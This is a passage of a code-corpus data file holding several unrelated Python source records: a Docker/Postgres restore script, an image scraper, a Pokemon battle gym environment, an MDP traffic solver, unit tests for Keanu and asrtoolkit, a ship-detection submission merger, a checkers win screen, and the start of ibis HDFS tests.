json.loads(json_obj.read())\n\tprint(json.dumps(data, indent=2))\n\t# input_lst = ['Riju']\n\tinput_lst = ['I', 'II', 'III']\n\tfor q in input_lst:\n\t\t# print(query('count', q))\n\t\tprint(group_by_name(q))","sub_path":"interview/ocrolus/dict/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596398164","text":"import os, sys, getopt\nfrom shutil import copytree\nfrom time import sleep\n\ndef get_args(argv):\n help_text = \"Usage: main.py -d dbname -f filename [-u, --user][-c, --container]\\nFor more options, try running config.py\"\n \n if not argv:\n print(help_text)\n sys.exit()\n \n try:\n opts, args = getopt.getopt(argv,\"f:d:uceh\",[\"dbname=\",\"filename=\", \"user=\", \"encoding=\"])\n except getopt.GetoptError:\n print(help_text)\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print(help_text)\n sys.exit()\n\n elif opt in (\"-d\", \"--dbname\"):\n TAGS['dbname'] = arg\n\n elif opt in (\"-f\", \"--filename\"):\n TAGS['filename'] = arg\n \n elif opt in ('-u', '--user'):\n TAGS['user'] = arg\n\n elif opt in ('-c', '--container'):\n TAGS['container_name'] = arg\n \n elif opt in ('-e', '--encoding'):\n TAGS['encoding'] = arg\n\ndef replace_tags(tags: dict, path: str):\n '''Troca cada tag pelo seu valor no arquivo em `filepath`'''\n \n for base_file in ('Dockerfile', 'docker-compose.yml'):\n with open(f'{path}/{base_file}', 'r') as file:\n text = file.read()\n\n # altera as tags\n for tag in tags.keys():\n text = text.replace('$'+tag, tags[tag])\n\n # reescreve o arquivo com as tags alteradas\n with open(f'{path}/{base_file}', 'w') as file:\n file.write(text)\n\ndef main():\n # Pega os argumentos passados no terminal\n get_args(sys.argv[1:])\n \n BASE_DIR = os.path.join(os.getcwd(), 'public/')\n HOST_DIR = os.path.join(os.getcwd(), f\"{TAGS['dbname']}/\")\n \n if TAGS['dbname'] in os.listdir():\n print('Pasta com o mesmo nome já existe')\n exit(1)\n \n TAGS['base_dir'] = BASE_DIR\n TAGS['host_dir'] = HOST_DIR\n\n # Cria a pasta com as cópias dos arquivos\n copytree(BASE_DIR, HOST_DIR)\n os.mkdir(os.path.join(HOST_DIR, 'volumes'))\n\n # Reescreve as tags\n replace_tags(TAGS, HOST_DIR)\n\n # Roda o container\n os.chdir(TAGS['host_dir'])\n os.system(f\"docker-compose up -d\")\n sleep(10)\n os.system(f\"docker exec -it {TAGS['container_name']} createdb {TAGS['dbname']}\")\n os.system(f\"docker exec -it {TAGS['container_name']} pg_restore -d {TAGS['dbname']} {TAGS['filename']}\")\n os.system(f\"docker exec -it {TAGS['container_name']} psql -d {TAGS['dbname']}\")\n\nTAGS = {\n 'container_name': 'postgres_container',\n 'dbname': 'new_db',\n 'user': 'postgres',\n 'password':'postgres',\n\n 'pgadmin_email': 'email@email.com',\n 'pgadmin_password': 'strongpassowrd',\n}\n\nif __name__ =='__main__':\n main()\n print(f\"PG Admin email: {TAGS['pgadmin_email']}\")\n print(f\"PG Admin password: {TAGS['pgadmin_password']}\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337297625","text":"# Example of using shell-wildcard style matching in list comprehensions\r\n\r\nfrom fnmatch import fnmatchcase as match\r\n\r\naddresses = [\r\n '5412 N CLARK ST',\r\n '1060 W ADDISON ST',\r\n '1039 W GRANVILLE AVE',\r\n '2122 N CLARK ST',\r\n '4802 N BROADWAY',\r\n]\r\n\r\na = [addr for addr in addresses if match(addr, '* ST')]\r\nprint(a)\r\n\r\nb = [addr for addr in addresses if match(addr, '54[0-9][0-9] *CLARK*')]\r\nprint(b)\r\n\r\nimport os\r\n\r\nfilenames = os.listdir(r'C:\\Users\\bach\\Downloads')\r\nprint(filenames)\r\n\r\n# List comprehension - http://www.diveintopython3.net/comprehensions.html#listcomprehension\r\nfilter = [name for name in filenames if name.endswith(('.mp4', '.wmv'))]\r\nprint('\\'filter\\' = ', filter)\r\n\r\nprint(any(name.endswith('.wmv') for name in filenames))\r\n","sub_path":"~src/src_python_cookbook/02/matching_strings_using_shell_wildcard_patterns/matching_strings_using_shell_wildcard_patterns.py","file_name":"matching_strings_using_shell_wildcard_patterns.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624487436","text":"# 請修改:\n# 1.存圖位置\n# 2.爬取頁面網址\n# 3.啟動chrome瀏覽器\n# 4.請依照景點名稱更改'_???????',到單引號中底線後面\n\nfrom selenium import webdriver\nimport time\nimport urllib.request\nimport os\n\n# 相同路徑\nfirstPath = './'\n\n# 英文景點名\nS = 'Gullfoss Waterfall, Iceland'\n# xpath = '//div[@id=\"imgid\"]/ul/li/a/img'\nxpath = '//div[@class=\"figure-result\"]/ul/li/div/a/img'\n\n# 存圖位置 需要先建好資料夾\nlocal_path = firstPath + S + '/'\nurl = 'https://pic.sogou.com/pics?query=' + S + '&di=2&_asf=pic.sogou.com&w=05009900'\n\n# 啟動chrome瀏覽器\nchromeDriver = firstPath + 'chromedriver/chromedriver' # chromedriver檔案放的位置\ndriver = webdriver.Chrome(chromeDriver)\n\n# 最大化窗口,因為每一次爬取只能看到視窗内的圖片\ndriver.maximize_window()\n\n# 紀錄下載過的圖片網址,避免重複下載\nimg_url_dic = {}\n\n# 瀏覽器打開爬取頁面\ndriver.get(url)\n\n# 模擬滾動視窗瀏覽更多圖片\npos = 0\nm = 0 # 圖片編號\nfor i in range(100):\n pos += i * 500 # 每次下滾500\n js = \"document.documentElement.scrollTop=%d\" % pos\n driver.execute_script(js)\n time.sleep(1)\n\n for element in driver.find_elements_by_xpath(xpath):\n try:\n img_url = element.get_attribute('src')\n\n # 保存圖片到指定路徑\n if img_url != None and not img_url in img_url_dic:\n img_url_dic[img_url] = ''\n m += 1\n ext = img_url.split('/')[-1]\n filename = str(m) + '_' + S + '_' + ext + '.jpg'\n print(filename)\n\n # 保存圖片\n urllib.request.urlretrieve(img_url, os.path.join(local_path, filename))\n\n except OSError:\n print('發生OSError!')\n print(pos)\n break\n\ndriver.close()\n","sub_path":"WebCrawler/sogou.py","file_name":"sogou.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598780884","text":"import numpy as np\nimport subprocess\nimport signal\nimport gym.spaces\n\n\nall_moves = ['bodyslam', 'hyperbeam', 'earthquake', 'tackle']\n\n\ndef readlines(sp, numlines):\n output = []\n for i in range(numlines):\n output.append(sp.stdout.readline())\n return output\n\n\ndef readuntil(sp, breakline):\n output = []\n line = sp.stdout.readline()\n while not line == breakline:\n output.append(line)\n line = sp.stdout.readline()\n return output\n\n\ndef string_to_array(raw):\n return raw.replace(' ', '_').replace(',', ' ').replace(':', ' ').replace('\"', ' ').replace('/', ' ').replace(\n '[', ' ').replace(']', ' ').replace('{', ' ').replace('}', ' ').split()\n\n\nclass PokeGym(gym.Env):\n def __init__(self):\n self.action_space = gym.spaces.Tuple((\n gym.spaces.Box(low=0, high=1, shape=(4,)),\n gym.spaces.Box(low=0, high=1, shape=(4,))))\n self.observation_space = gym.spaces.Tuple((\n gym.spaces.Box(low=0, high=1, shape=(12,)),\n gym.spaces.Box(low=0, high=1, shape=(12,))))\n self.num_players = 2\n self.sim = None\n self.hp = None\n self.pp = None\n self.recharge = None\n self.s = None\n\n def render(self, mode='human'):\n # TODO this\n pass\n\n def reset(self):\n if self.sim is not None:\n self.sim.send_signal(signal.SIGINT)\n self.sim = subprocess.Popen(['./pokemon-showdown', 'simulate-battle'],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=1, universal_newlines=True)\n self.sim.stdin.write('>start {\"formatid\":\"gen1ou\"}\\n')\n self.sim.stdin.write('>player p1 {\"name\":\"A\",\"team\":\"Tauros|||none|bodyslam,hyperbeam,earthquake,tackle||255,255,255,255,255,255||30,30,30,30,30,30||100|\"}\\n')\n self.sim.stdin.write('>player p2 {\"name\":\"B\",\"team\":\"Tauros|||none|bodyslam,hyperbeam,earthquake,tackle||255,255,255,255,255,255||30,30,30,30,30,30||100|\"}\\n')\n # readlines(self.sim,44)\n self.hp = np.array([1.0]*2)\n self.pp = np.array([[1.0]*4]*2)\n self.recharge = np.array([False]*2)\n self.s = self.get_state()\n return self.s\n\n def step(self, action):\n r = (0, 0)\n a = [\"\"]*self.num_players\n for p in range(self.num_players):\n # TODO Pick a strategy by only allowing valid moves, normalizing the outputs then selecting randomly\n if self.recharge[p]:\n a[p] = 'recharge'\n self.recharge[p] = False\n else:\n rand = np.random.random()\n cum_prob = np.cumsum(action)\n for prob in cum_prob:\n if rand < prob:\n a[p] = all_moves[action[p]]\n break\n self.sim.stdin.write('>p'+str(p+1)+' move '+a[p]+'\\n')\n if a[p] == 'recharge' and p == 0:\n readuntil(self.sim, '\\n')\n raw = readuntil(self.sim,'\\n')\n if raw[-1] == '|win|A\\n':\n r = (1, -1)\n if raw[-1] == '|win|B\\n':\n r = (-1, 1)\n # TODO If the person used Hyper Beam you'll have to manually change the PP values since they don't display\n if r == (0, 0):\n self.hp = [None]*self.num_players\n for p in range(self.num_players):\n data = string_to_array(raw[2])\n if data[6] == \"recharge\":\n self.recharge[p] = True\n self.hp[p] = float(data[21])/float(data[22])\n else:\n self.pp[p] = []\n for val in [8, 20, 32, 44]:\n self.pp[p].append(float(data[val])/float(data[val+2]))\n self.hp[p] = float(data[63])/float(data[64])\n raw = readuntil(self.sim, '\\n')\n self.s = self.get_state()\n return self.s, r, (False, False), ({}, {})\n else:\n self.sim.send_signal(signal.SIGINT)\n self.sim = None\n # TODO Still update the state? Or does it even matter?\n infos = [{}, {}]\n if r == (1, -1):\n infos = [{'winner': True}, {}]\n if r == (-1, 1):\n infos = [{}, {'winner': True}]\n return self.s, r, (True, True), infos\n\n def get_state(self):\n state = [None]*self.num_players\n for p in range(self.num_players):\n state[p] = np.concatenate(([self.hp[p]], self.pp[p], [self.recharge[p]],\n [self.hp[1-p]], self.pp[1-p], [self.recharge[1-p]]), axis=0)\n return tuple(state)\n","sub_path":"pokegym.py","file_name":"pokegym.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27900539","text":"import numpy as np\nfrom cvxopt import matrix, solvers\nimport scmdp_solver.gsc_mdp as GSC\nimport copy as cp\nimport roulette\nfrom tempfile import TemporaryFile\n\nfrom config import *\nimport world\nimport car\nimport state\n\nnp.set_printoptions(linewidth = 1000, precision = 3, suppress = True, threshold = 'nan')\n\ndef print_m(matrix):\n '''visualize a 2d matrix'''\n (row,col) = np.shape(matrix)\n print(\" \"),\n for j in range(col):\n print(str(j) + ' '),\n print(\" \")\n for i in range(row):\n print(i, matrix[i])\n\ndef print_part(matrix, row_s, row_e, col_s, col_e):\n print(\"{:<4}\".format(' ')), # print head\n for j in range(col_e - col_s + 1): # print col numbers\n print(\"{:<4}\".format(j)),\n print('\\n'),\n for i in range(row_s, row_e + 1):\n print(\"{:<4}\".format(i)), # print row numbers\n for j in range(col_s, col_e + 1):\n print(\"{:<4}\".format(matrix[i,j])),\n print('\\n'),\n\nclass SCMDP:\n def __init__(self, world_, sdic_, T, A, m, trans_suc_rate):\n self.world = world_\n self.sdic = sdic_ \n self.T = T # length of planning horizon\n self.n = self.sdic.n # number of states\n self.A = A # number of actions\n self.m = m # number of constraints\n self.trans_suc_rate = trans_suc_rate # transition success rate \n\n # construct transition matrix G\n self.construct_G() \n # construct reward matrix R (over T-1 horizon)\n self.construct_RT() \n self.construct_R()\n # construct density vector\n self.construct_d()\n # construct L matrix\n self.construct_L()\n # initial distribution of the agents \n self.construct_x0()\n # discount factor\n self.gamma = 0.99\n \n # policy matrix\n self.bf_Q = []; self.bf_x = []; self.phi_Q = []; self.phi_x = []; self.un_Q = []; self.un_x = []\n\n def construct_G(self):\n '''A x n x n'''\n self.G = np.zeros((self.A, self.n, self.n))\n for act in range(self.A):\n if act == STAY:\n self.G[act,:,:] = np.eye(self.n) # stay results in an identity matrix\n else:\n # probability from j to i\n G_act = np.zeros((self.n, self.n))\n for j in range(self.n):\n state_j = self.sdic.get_state(j) # start from this state\n loc_j = [state_j[0], state_j[1]]\n result_loc = self.world.move_consq(loc_j, act)\n for i in range(self.n):\n state_i = self.sdic.get_state(i)\n loc_i = [state_i[0], state_i[1]]\n if state.same_loc(result_loc, loc_i) \\\n and state_i[2] == state_j[2] and state_i[3] == state_j[3] and state_i[4] == state_j[4]:\n G_act[i][j] = 1\n self.G[act,:,:] = cp.deepcopy(G_act)\n #print_part(self.G[LEFT], 0, 167, 167, 167)\n #print(np.shape(self.G))\n\n def construct_RT(self):\n ''' n x 1'''\n self.RT = np.zeros((self.n,1)) \n for i in range(self.n):\n state_vec = self.sdic.get_state(i)\n # if the current position is equal to destination\n if state.same_loc([state_vec[0], state_vec[1]], [state_vec[2], state_vec[3]]):\n self.RT[i,0] = REWARD\n #print_m(self.RT)\n\n def construct_R(self):\n ''' (T-1) x n x A'''\n self.R = np.zeros((self.T-1, self.n, self.A))\n R0 = np.zeros((self.n, self.A))\n for a in range(self.A):\n R0[:,a] = cp.deepcopy(self.RT[:,0])\n for t in range(self.T-1):\n self.R[t,:,:] = cp.deepcopy(R0)\n # print_m(self.R[1])\n\n def construct_L(self):\n ''' m x n'''\n #self.L = np.zeros((self.m, self.n))\n # note: if we have more than two types of car this need to change\n I_SMALL = CAP_SMALL * np.eye(self.m) # small car\n I_BIG = CAP_BIG * np.eye(self.m) # big car\n self.L = I_SMALL\n for i in range(len(DESTINATION) - 1):\n self.L = np.append(self.L, I_SMALL, axis = 1)\n for i in range(len(DESTINATION)):\n self.L = np.append(self.L, I_BIG, axis = 1)\n # print_m(self.L)\n\n def construct_d(self):\n ''' m x 1'''\n self.d = np.zeros((self.m, 1))\n state_count = 0\n for i in range(self.world.rows):\n for j in range(self.world.columns):\n if self.world.world_map[i][j].block_type != OFFROAD:\n self.d[state_count, 0] = 1.0 * self.world.world_map[i][j].cap_bound / NUM_CAR\n state_count += 1\n print_m(self.d)\n\n def construct_x0(self):\n ''' n x 1, assume cars are distributed equally in start '''\n self.x0 = np.zeros((self.n, 1))\n for i in range(self.n):\n state_vec = self.sdic.get_state(i)\n start_pos = [state_vec[0], state_vec[1]]\n if not(start_pos in START):\n continue\n else:\n des_pos = [state_vec[2], state_vec[3]]\n if state.same_loc(DESTINATION[START.index(start_pos)], des_pos):\n self.x0[i, 0] = INIT_DENSITY_CORNER\n # print_m(self.x0)\n\n def solve(self):\n [self.un_Q, self.un_x, self.phi_Q, self.phi_x, self.bf_Q, self.bf_x] = GSC.mdp(self.G, self.R, self.RT, self.L, self.d, self.x0, self.gamma)\n print(\"scmdp policy solved\")\n# print(self.bf_Q)\n print(np.dot(self.L, self.bf_x))\n# res_un = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, un_x)\n# res_phi = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, phi_x)\n# res_bf = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, bf_x)\n# print(np.amin(res_un))\n# print(np.amin(res_phi))\n# print(np.amin(res_bf))\n# print(np.dot(self.L,un_x))\n# print(np.dot(self.L,phi_x))\n# print(np.dot(self.L,bf_x))\n\n def save_to_file(self):\n '''save un_Q, un_x, phi_Q, phi_x, bf_Q, bf_x to .npy files'''\n np.save(\"policy/un_Q\", self.un_Q)\n np.save(\"policy/un_x\", self.un_x)\n np.save(\"policy/phi_Q\", self.phi_Q)\n np.save(\"policy/phi_x\", self.phi_x)\n np.save(\"policy/bf_Q\", self.bf_Q)\n np.save(\"policy/bf_x\", self.bf_x)\n\n def load_from_file(self):\n self.un_Q = np.load(\"policy/un_Q.npy\")\n self.un_x = np.load(\"policy/un_x.npy\")\n self.phi_Q = np.load(\"policy/phi_Q.npy\")\n self.phi_x = np.load(\"policy/phi_x.npy\")\n self.bf_Q = np.load(\"policy/bf_Q.npy\")\n self.bf_x = np.load(\"policy/bf_x.npy\")\n\n def choose_act(self, state, T):\n policy = self.bf_Q[T][state]\n # print(\"Policy vector\", policy)\n roulette_selector = roulette.Roulette(policy)\n action = roulette_selector.select()\n # print(\"Action selected:\", action)\n return action\n\n def choose_act_phi(self, state, T):\n policy = self.phi_Q[T][state]\n # print(\"Policy vector\", policy)\n roulette_selector = roulette.Roulette(policy)\n action = roulette_selector.select()\n # print(\"Action selected:\", action)\n return action\n\nif __name__ == \"__main__\":\n # call solve and store resulted matrices\n test_world = world.World()\n state_dict = state.StateDict(test_world) \n scmdp_solver = SCMDP(world_ = test_world, sdic_ = state_dict, T = 10, m = test_world.num_road, A = len(ACTIONS), trans_suc_rate = TRANS_SUC_RATE)\n scmdp_solver.solve()\n scmdp_solver.save_to_file()\n","sub_path":"traffic/scmdp.py","file_name":"scmdp.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448225833","text":"import pytest\nfrom examples import thermometers\nfrom py4j.protocol import Py4JJavaError\nfrom keanu import KeanuRandom, BayesNet, Model\nfrom keanu.algorithm import GradientOptimizer\n\n\n@pytest.fixture\ndef model() -> Model:\n KeanuRandom.set_default_random_seed(1)\n model = thermometers.model()\n\n model.thermometer_one.observe(22.0)\n model.thermometer_two.observe(20.0)\n return model\n\n\ndef test_gradient_op_bayes_net(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n assert gradient_optimizer.net is net\n\n\ndef test_gradient_op_vertex(model: Model) -> None:\n gradient_optimizer = GradientOptimizer(model.temperature)\n assert len(list(gradient_optimizer.net.get_latent_vertices())) == 1\n\n\ndef test_gradient_op_throws_with_invalid_net_param() -> None:\n with pytest.raises(TypeError) as excinfo:\n GradientOptimizer(500) # type: ignore # this is expected to fail mypy\n\n assert str(excinfo.value) == \"net must be a Vertex or a BayesNet. Was given {}\".format(int)\n\n\ndef test_gradient_can_set_max_eval_builder_properties(model: Model) -> None:\n gradient_optimizer = GradientOptimizer(model.temperature, max_evaluations=5)\n\n with pytest.raises(Py4JJavaError):\n #This throws a Gradient Optimizer: \"Reached Max Evaluations\" error\n logProb = gradient_optimizer.max_a_posteriori()\n\n\ndef test_thermometers_map_gradient(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n logProb = gradient_optimizer.max_a_posteriori()\n assert logProb < 0.\n\n temperature = model.temperature.get_value()\n assert 20.995 < temperature < 21.005\n\n\ndef test_thermometers_max_likelihood_gradient(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n logProb = gradient_optimizer.max_likelihood()\n assert logProb < 0.\n\n temperature = model.temperature.get_value()\n assert 20.995 < temperature < 21.005\n","sub_path":"keanu-python/tests/test_gradient_optimization.py","file_name":"test_gradient_optimization.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257124142","text":"#!/usr/bin/env python\n\"\"\"\nTest wer calculation\n\"\"\"\n\nimport json\n\nfrom utils import get_sample_dir, get_test_dir\n\nfrom asrtoolkit.data_structures import Transcript\n\ntest_dir = get_test_dir(__file__)\nsample_dir = get_sample_dir(__file__)\n\n\ndef test_json_initialization():\n \"execute single test\"\n\n input_dict = json.load(open(f\"{sample_dir}/BillGatesTEDTalk.json\"))\n text_object = Transcript(input_dict, file_format=\"greenkey\")\n\n ref = (\n open(f\"{sample_dir}/BillGatesTEDTalk_transcribed.stm\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n text_object.write(f\"{test_dir}/file_conversion_test.stm\")\n new = (\n open(f\"{test_dir}/file_conversion_test.stm\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n assert ref == new\n\n\ndef test_txt_initialization():\n \"execute single test\"\n\n input_dict = json.load(open(f\"{sample_dir}/BillGatesTEDTalk.json\"))\n text = Transcript(input_dict, file_format=\"greenkey\")\n text.file_extension = \"txt\"\n\n text_object = Transcript(text.__str__())\n\n ref = (\n open(f\"{sample_dir}/BillGatesTEDTalk_transcribed.txt\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n text_object.write(f\"{test_dir}/file_conversion_test.txt\")\n new = (\n open(f\"{test_dir}/file_conversion_test.txt\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n assert ref == new\n\n\nif __name__ == \"__main__\":\n import sys\n\n import pytest\n\n pytest.main(sys.argv)\n","sub_path":"tests/test_initialization.py","file_name":"test_initialization.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326891218","text":"import pickle\nimport json\n\nimport numpy as np\n\n\ndef calc_iou(ax0,ay0,ax1,ay1,bx0,by0,bx1,by1):\n dx = max(0, min(ax1, bx1) - max(ax0, bx0))\n dy = max(0, min(ay1, by1) - max(ay0, by0))\n area_cross = dx * dy\n area_a = (ax1-ax0) * (ay1-ay0)\n area_b = (bx1-bx0) * (by1-by0)\n return area_cross / (area_a + area_b - area_cross)\n\ndef rect(x1,y1,x2,y2):\n return [x1,x1,x2,x2,x1], [y1,y2,y2,y1,y1]\n\ndef rotm90(boxes, dx):\n xmin = dx - boxes[:,3]\n ymin = boxes[:,0].copy()\n xmax = dx - boxes[:,1]\n ymax = boxes[:,2].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef rotm180(boxes, dx):\n xmin = dx - boxes[:,2].copy()\n ymin = dx - boxes[:,3].copy()\n xmax = dx - boxes[:,0].copy()\n ymax = dx - boxes[:,1].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef rotm270(boxes, dx):\n xmin = boxes[:,1].copy()\n ymin = dx - boxes[:,2].copy()\n xmax = boxes[:,3].copy()\n ymax = dx - boxes[:,0].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef arrange(data, threshold=0.4, rate=1.0, ang=0):\n anns = []\n for k in range(len(data)):\n x0, y0, dx, boxes, labels, scores = data[k]\n boxes = boxes.reshape([-1,4]) * rate\n if ang == 90:\n boxes = rotm90(boxes, dx)\n elif ang == 180:\n boxes = rotm180(boxes, dx)\n elif ang == 270:\n boxes = rotm270(boxes, dx)\n labels = labels.flatten()\n scores = scores.flatten()\n for i in range(boxes.shape[0]):\n x1 = boxes[i,0] + x0\n y1 = boxes[i,1] + y0\n x2 = boxes[i,2] + x0\n y2 = boxes[i,3] + y0\n if boxes[i,0] < 1 or boxes[i,1] < 1 or boxes[i,2] > dx-1 or boxes[i,3] > dx-1:\n continue\n if scores[i] > threshold:\n anns.append([[x1,y1,x2,y2],labels[i],scores[i]])\n return anns\n\n\ndef drop(anns, threshold=0.6):\n drop_ids = []\n for i_a, ann_a in enumerate(anns):\n if i_a in drop_ids:\n continue\n box_a, label_a, score_a = ann_a\n for i_b, ann_b in zip(np.arange(len(anns))[i_a+1:], anns[i_a+1:]):\n if i_b in drop_ids:\n continue\n box_b, label_b, score_b = ann_b\n iou = calc_iou(*box_a, *box_b)\n if iou > threshold:\n if score_a < score_b:\n drop_ids.append(i_a)\n break\n else:\n drop_ids.append(i_b)\n new_anns = []\n for i0, ann in enumerate(anns):\n if i0 in drop_ids:\n continue\n new_anns.append(ann)\n new_anns = sorted(new_anns, key=lambda x:x[2], reverse=True)\n return new_anns\n\ndef convert2dict(anns):\n labels = {'ship_moving':[], 'ship_not_moving':[], 'barge':[]}\n for box, label, _ in anns:\n if label == 0:\n labels['ship_moving'].append(box)\n elif label == 1:\n labels['ship_not_moving'].append(box)\n elif label == 2:\n labels['barge'].append(box)\n else:\n assert False\n return labels\n\ndef mk_label(index, size):\n image_name = f'test_{index:0>2}.jpg'\n \n with open(f\"data/det_pred_ang0/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns0 = arrange(data, rate=192/256, ang=0)\n with open(f\"data/det_pred_ang90/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns90 = arrange(data, rate=192/256, ang=90)\n with open(f\"data/det_pred_ang180/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns180 = arrange(data, rate=192/256, ang=180)\n with open(f\"data/det_pred_ang270/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns270 = arrange(data, rate=192/256, ang=270)\n \n anns0.extend(anns90)\n anns0.extend(anns180)\n anns0.extend(anns270)\n \n anns = drop(anns0, threshold=0.8)\n labels = convert2dict(anns)\n print(image_name)\n for key in labels.keys():\n print(f\"#{key}: {len(labels[key])}\")\n print(\"------------------------\")\n return image_name, labels\n\ndef main():\n from joblib import Parallel, delayed\n processed = Parallel(n_jobs=10)([delayed(mk_label)(i, 192) for i in range(21)])\n \n submits = dict()\n for image_name, labels in processed:\n submits[image_name] = labels\n\n with open('submits/19021403_0.4_0.8.json', \"w\") as f:\n json.dump(submits, f)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"mk_submit.py","file_name":"mk_submit.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301862561","text":"import pygame, time\nimport threading\nimport sp_mp, Settings\n\ndef CreateGameWindow(width, height):\n pygame.display.set_caption(\"Checkers !\")\n gameWindow = pygame.display.set_mode((width, height))\n return gameWindow\n\ndef WriteText(text, text_pos_x, text_pos_y, text_size):\n text_font = pygame.font.SysFont(None, text_size)\n text_render = text_font.render(text, True, Black)\n gameWindow.blit(text_render, (text_pos_x, text_pos_y))\n\nclass CreateButton():\n def layout(self,button):\n pygame.draw.rect(gameWindow, button[4], (button[0], button[1], button[2], button[3]))\n\n def text(self, button, space_x, space_y):\n WriteText(button[5], button[0] + space_x, button[1] + space_y, button[6])\n\n def Animate(self, button, actual_color, animate_color):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n if mouse_x >= button[0] and mouse_y >= button[1] and mouse_x <= button[0] + button[2] and mouse_y <= button[1] + button[3]:\n button[7] += 1\n if button[7] == 1:\n button[6] += 1\n button[4] = animate_color\n else:\n button[4] = actual_color\n button[6] = 30\n button[7] = 0\n\n#Colors:\nWhite = (255,255,255)\nBlack = (0,0,0)\nGray = (128,128,128)\nLightWhite = (160,160,160)\nLightGreen = (0,210,0)\nBrightGreen = (0,255,0)\nLightRed = (150,0,0)\nBrightRed = (255,0,0)\nLightBlue = (0,0,200)\nBrightBlue = (0,0,255)\n\n#Dimensions:\ngameWindow_width = 680\ngameWindow_height = 680\n\ngameWindow = CreateGameWindow(gameWindow_width,gameWindow_height)\n\ndef ShowWinner(Player):\n while True:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n gameWindow.fill(Gray)\n\n player_details = [250, gameWindow_height/2 - 100, 260 ,500, LightGreen, Player, 30, 0]\n\n createButton = CreateButton()\n #createButton.layout(player_details)\n createButton.text(player_details, 56, 20)\n\n pygame.display.update()\n\n for key in pygame.event.get():\n if key.type == pygame.QUIT:\n pygame.quit()\n\nShowWinner('player 1')","sub_path":"Back up/Win.py","file_name":"Win.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439524230","text":"# Copyright 2014 Cloudera Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom six import BytesIO\n\nfrom posixpath import join as pjoin\nfrom os import path as osp\nimport os\nimport shutil\n\nimport pytest\n\nfrom ibis.filesystems import HDFS\nfrom ibis.compat import unittest\nfrom ibis.impala.tests.common import IbisTestEnv\nimport ibis.compat as compat\nimport ibis.util as util\nimport ibis\n\n\nENV = IbisTestEnv()\n\n\nclass MockHDFS(HDFS):\n\n def __init__(self):\n self.ls_result = []\n\n def set_ls(self, results):\n self.ls_result = results\n\n def ls(self, *args, **kwargs):\n return self.ls_result\n\n\nclass TestHDFSRandom(unittest.TestCase):\n\n def setUp(self):\n self.con = MockHDFS()\n\n def test_find_any_file(self):\n ls_contents = [(u'foo',\n {u'type': u'DIRECTORY'}),\n (u'bar.tmp',\n {u'type': u'FILE'}),\n (u'baz.copying',\n {u'type': u'FILE'}),\n (u'_SUCCESS',\n {u'type': u'FILE'}),\n (u'.peekaboo',\n {u'type': u'FILE'}),\n (u'0.parq',\n {u'type': u'FILE'}),\n (u'_FILE',\n {u'type': u'DIRECTORY'})]\n\n self.con.set_ls(ls_contents)\n\n result = self.con._find_any_file('/path')\n assert result == '0.parq'\n\n\n@pytest.mark.hdfs\nclass TestHDFSE2E(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.ENV = ENV\n cls.tmp_dir = pjoin(cls.ENV.tmp_dir, util.guid())\n 